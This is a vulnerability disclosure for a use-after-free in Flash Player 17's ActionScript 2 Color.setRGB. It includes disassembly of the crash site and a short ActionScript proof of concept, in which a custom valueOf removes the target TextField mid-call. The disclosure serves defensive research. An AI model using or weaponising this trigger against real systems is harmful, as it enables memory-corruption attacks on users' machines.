A little bug while calling Color.setRGB in AS2.
Chrome 42.0.2311.90 with Flash 17.0.0.169

The Color constructor needs a target_mc object like a MovieClip, a TextField etc. While calling Color.setRGB with a custom object, it is possible to execute arbitrary AS2 code that might delete the target_mc object leading to a UAF.
(These lines come from flashplayer17_sa.exe 17.0.0.169):

.text:004B82D0                 push    esi
.text:004B82D1                 mov     esi, [esp+4+arg_0]
.text:004B82D5                 push    edi
.text:004B82D6                 mov     edi, ecx
.text:004B82D8                 mov     ecx, [edi+94h]  ; edi points to freed memory
.text:004B82DE                 and     ecx, 0FFFFFFFEh
.text:004B82E1                 add     ecx, 3Ch
.text:004B82E4                 mov     eax, esi
.text:004B82E6                 call    sub_4B0724      ; crash below
...
.text:004B0724                 mov     edx, [ecx]      ; crash here ecx = 3ch (null pointer) (ecx = 40h in Pepper Flash)
.text:004B0726                 cmp     edx, [eax]
.text:004B0728                 jnz     short loc_4B077E


Compile the poc with Flash CS5.5
***************************************************************************
Content of as2_color_uaf.fla:

var tf:TextField = this.createTextField("tf",1,1,1,4,4)
var o = new Object()
o.valueOf = function () {
	tf.removeTextField()
	return 0x41414142
}

var c = new Color(tf)
c.setRGB(o)
